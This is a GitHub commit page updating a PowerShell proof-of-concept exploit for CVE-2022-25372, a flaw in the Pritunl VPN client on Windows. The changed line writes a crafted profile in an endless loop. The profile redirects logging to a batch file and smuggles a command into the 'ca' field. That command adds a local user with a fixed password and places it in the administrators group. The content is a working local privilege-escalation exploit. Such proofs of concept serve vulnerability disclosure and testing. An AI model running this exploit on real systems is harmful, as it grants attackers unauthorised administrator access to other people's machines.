Skip to content

Commit

Permalink
Update CVE-2022-25372.ps1
Browse files Browse the repository at this point in the history 
- Updated PoC to demonstrate privilege escalation by creating a new user and adding them to the administrators group.
  • Loading branch information
@TeneBrae93
TeneBrae93 authored Jun 29, 2023
1 parent f10d1f6 commit 668b0dd
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion CVE-2022-25372/CVE-2022-25372.ps1
View file
Original file line number Diff line number Diff line change
@@ -1,2 +1,2 @@
$profile_id = ((Select-String '{"name":"privesc"' $env:APPDATA\pritunl\profiles\*).filename).split('.')[0];
while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"INJECTED CONTENT`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"}
while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"& net user test SecurePassword123 /add /expires:never /passwordchg:no && net localgroup administrators test /add &`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"}

0 comments on commit 668b0dd

Please sign in to comment.